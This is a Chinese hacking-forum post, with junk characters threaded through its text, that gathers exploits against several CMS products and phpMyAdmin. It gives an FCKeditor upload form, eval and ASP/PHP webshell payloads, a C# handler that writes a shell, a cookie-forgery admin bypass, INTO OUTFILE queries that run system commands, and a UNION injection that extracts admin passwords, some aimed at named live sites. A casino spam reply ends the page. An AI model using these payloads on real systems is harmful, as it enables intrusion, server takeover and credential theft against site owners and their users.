) O8 A0 W! W7 M8 W/ r---------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 @6 s* v4 n+ H/ D( x) O7 F
5 j6 l3 C* @! h) l$ T
YxShop易想购物商城4.7.1版本任意文件上传漏洞5 M/ n; C3 C2 P. G

' y& c" ^6 U) g+ Dhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx, V% q6 d9 J$ P5 c" B+ `5 `
跳转到网站根目录上传任意文件。) S/ O# V' M5 D
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
- ]& Y' d  @8 k<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
* }9 V! o& E: P+ w1 r# A1 {Upload a new file:<br>
% J; {# @& |) `) L<input type="file" name="NewFile" size="50"><br>
9 a, g, |6 |/ w1 t<input id="btnUpload" type="submit" value="Upload">
. C+ x% Y/ ^: f8 W6 [/ y</form>0 ^1 x% F: V8 F* d# e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# A6 @0 Q' ?4 j6 t. L8 R3 k- J
' B; J2 v  i# n+ f5 z$ u* @& n: A+ nSDcms 后台拿webshell
1 y, J- L; j, n* ]3 v! J6 v( J9 u- o) l( e! R8 {0 `
第一种方法:' @  Q# c0 Q0 g# P: [
进入后台-->系统管理-->系统设置-->系统设置->网站名称;8 o. A3 V9 ~* f$ c4 o) t
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
- g4 k% z8 X- D! T8 n6 Q. H& @' {用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。+ i; Z/ i* l3 c$ W: W) q
第二种方法:
- u1 Y4 B* i6 \. H; `5 A2 n5 l1 ?进入后台-->系统管理-->系统设置-->系统设置->上传设置;
' k  P2 G& e8 v, F. H在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
5 y+ @1 H6 _% [, w" e& U; p9 ~/ g第三种方法:9 x1 e0 Z5 K3 f
进入后台-->界面管理-->模板文件管理-->创建文件
6 [& h* [% [3 K  z' b0 f) e: o文件名写入getshell.ashx0 H/ b5 j  ?9 G, V! }
内容写入下面内容:
7 V: ^& P9 O+ q7 F4 W" A/====================复制下面的=========================/% j, l  e6 M6 Z; d) J" J8 j
<%@ WebHandler Language="C#" Class="Handler" %>
! W0 R+ G9 V. U+ q8 g3 b* vusing System;
# j3 k& P+ N7 }- i) P2 Lusing System.Web;
$ I5 q* |( x% X$ E. Vusing System.IO;
. W- l* S8 ~0 U) X. Z3 O. W4 T* Hpublic class Handler : IHttpHandler {
& o$ a8 M2 y# ]6 Kpublic void ProcessRequest (HttpContext context) {
; _9 h. Z$ A4 _# E- Ncontext.Response.ContentType = "text/plain";) P$ S' |) D3 O  e: P! a
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* x' D- q, a- l$ L  M
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
: s/ j: N9 ~# s% `- ~file1.Flush();
' e" j. F, F: t' m/ tfile1.Close();- V  J8 o" R0 a5 ], G
}
4 H; Z: ~) ~' I' E" P8 Cpublic bool IsReusable {
' X3 Y# ~  F& B( U( N3 U( {1 zget {
$ s' ~6 b* c9 K' V- h, \* J% nreturn false;9 l/ E5 B5 R* S
}
9 X/ ?' `. ]: C$ _' \7 |}) m1 g: }  r" I* P' k$ P
}
1 `# x) S! m" H# V0 f# x: }/=============================================/
+ \9 I+ I. J8 N: J访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
+ h, k, t. X9 _: G& ~会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接3 ~" O) @9 a- E. v3 s) i# M( t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  L. u1 o+ N) k+ [8 C/ e, ~3 ?
* P9 N( V* P! u! Q5 w( m4 E' aESCMS网站管理系统0day6 P. V" b& Z. ^  P

* C1 l- K( }5 j. x  h后台登陆验证是通过admin/check.asp实现的
3 Q" Z5 b" o1 [& S. d# }+ p8 N& o( p2 p' V# p
首先我们打开http://target.com/admin/es_index.html
! Q' E# w; t6 m- x9 G然后在COOKIE结尾加上
7 \* c! p2 u4 i1 e, L; ESCMS$_SP2=ES_admin=st0p;, f# P7 m' b9 L, p2 B0 D
修改,然后刷新
7 W2 x% T0 n6 F" a* C8 D$ ]进后台了嘎..
7 s: @+ i0 P+ y5 Y+ J* ^  v然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
" K3 m1 k4 H% s  \! E+ d0 M( T: T
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.. K5 Z4 V2 a/ U. \% B/ ^9 x* y
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp/ {- T% m( K% b9 n; R# e. Z
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
- E" _, W1 i: Z4 u; g* q% I在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
3 P! z" G$ l3 z$ d- R# a------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- b- D! h! K' o; v( @

) w- h  G' K9 j4 K, n宁志网站管理系统后台无验证漏洞及修复; s- }4 U! z9 p' p; a; ?% l: e

! |. u( G* N( E/ H网上搜了一下,好像没有发布.如有雷同纯粹巧合!$ O% c. c8 ~# c; P* x! m
官方网站:www.ningzhi.net7 d; T, `4 j3 q$ r
学校网站管理系统 V.2011版本 . ^5 g! ?! }" [  w7 E# Q. O7 D4 |
http://down.chinaz.com/soft/29943.htm $ z, a3 l( w$ O2 G) ^& v" [7 B$ S0 n
其它版本(如:政府版等),自行下载.
: l+ O- z7 i( r1 _/ B漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~0 y  r* t8 I1 w- W) c
login.asp代码如下:
' g  a( k0 y2 k+ h<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> % w( ?% m, ?( ^( x, \# n, z1 D; B
manage.asp代码我就不帖出来了.反正也没验证.
7 @& i" R9 u% D+ F: ]只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
$ O* s0 b  ^! h. k( `, A+ k1 S漏洞利用:
' j0 D3 \1 @: |5 }5 }) I直接访问http://www.0855.tv/admin/manage.asp
; _/ \# u& r  Y$ L; n' Y* I5 f6 \数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
9 F1 k, w$ Q& {; b. S/ @----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 l1 l5 L7 O* v/ Y/ C& H9 G2 R; {6 |) S4 }* ~* t
phpmyadmin拿shell的四种方法总结及修复
# d7 L7 S3 E) G% t* A/ F* I8 j# M; S& y3 T. S( [- U1 `& E
方法一:
* j9 `4 Y! S2 l! \CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
- e' f( L- o  s( j' CINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
" h" a- P0 s7 USELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';( o) M% j! Q4 j* m0 \
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
. u& T! V0 R& [( f; n2 C    一句话连接密码:7on
  W9 |  E) S3 X$ x. T方法二:  P* K3 B" T, K, D6 a
读取文件内容:    select load_file('E:/xamp/www/s.php');
# `% p  P9 N8 M! c4 a( A5 M写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'2 i/ x7 Z( N/ Z+ H) ?
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'5 _, B( y( p0 D4 [( T0 U& T
方法三:9 u% j4 J# Y* f8 T2 g% f, {
JhackJ版本 PHPmyadmin拿shell: ]5 H( o8 t! _1 @$ p( \1 W
Create TABLE study (cmd text NOT NULL);1 o7 p, v) G; B9 u+ d$ x8 `
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');5 ?. D7 {+ Y* @9 ~7 E
select cmd from study into outfile 'E:/wamp/www/7.php';
6 L1 y9 ^4 n0 Q  j$ h1 uDrop TABLE IF EXISTS study;
, O/ g( U: Z6 J! Y1 z) i<?php eval($_POST[cmd])?>
2 g( }6 Z/ e! g2 D3 p. g4 YCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。3 j2 |! m& `5 e6 X3 k: t8 m& i1 g
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1% X* Z2 K: p3 Y# K# c# P+ Z( H2 g
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
9 H& _0 I7 I! n4 dDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
/ G4 k7 Y3 G$ B+ d. H+ H方法四:
0 N2 h' I$ e" O# v( m9 V2 ]select load_file('E:/xamp/www/study.php');) l- H2 j) S$ {/ d5 p7 @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' Z0 Z( }3 g2 X" R# t: W- n然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
. _7 V0 S2 Z$ W) L& D0 H" k# V-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 S$ n9 }# O- k2 w' q; I) d2 M, z/ I7 t
NO.001中学网站管理系统 Build 110628 注入漏洞) q7 P5 N8 Q. U2 ^7 O* s+ t4 p2 `
% N8 L% [! c6 Z& u2 j: E# Y3 y
NO.001中学网站管理系统功能模块:8 o4 x; Q! F0 Y8 |: N5 l; K! M: D! f
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等6 P! q% J5 l! h3 x: }) {: h( \
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息0 h7 ?) \  T7 s5 d9 i4 q" y
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息; P/ `" F' C; z1 W5 L% L; m- t
4.视频图片管理:一级分类,动态添加视频或者图片等信息
9 m: C$ W; o. i- d' ^5.留言管理:对留言,修改,删除、回复等管理
% v) R  @9 V) E" L  W$ A6.校友频道:包括校友资料excel导出、管理等功能5 ~( |" R3 v/ z$ D( o/ d0 t
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
- Q; K; y$ k; l' K& n2 k) \默认后台:admin/login.asp
% B) ]5 t, p' J% Y* c官方演示:http://demo.001cms.net- D/ j9 L# q2 u8 g! m! }4 A
源码下载地址:http://down.chinaz.com/soft/30187.htm
% {' {# j0 t6 I4 Y. SEXP:2 x* Y. c  R0 n( ?! l/ f/ y& W
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 F# v/ |) ^1 X- y1 X! E6 S" e
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin% W- m/ {  Q7 X2 ?* T$ ?3 _
getshell:后台有备份,你懂的" Q0 l9 @/ c" P+ E9 f' O
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
- u% ^/ ^7 k, W) l2 {0 _! A" C8 d-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表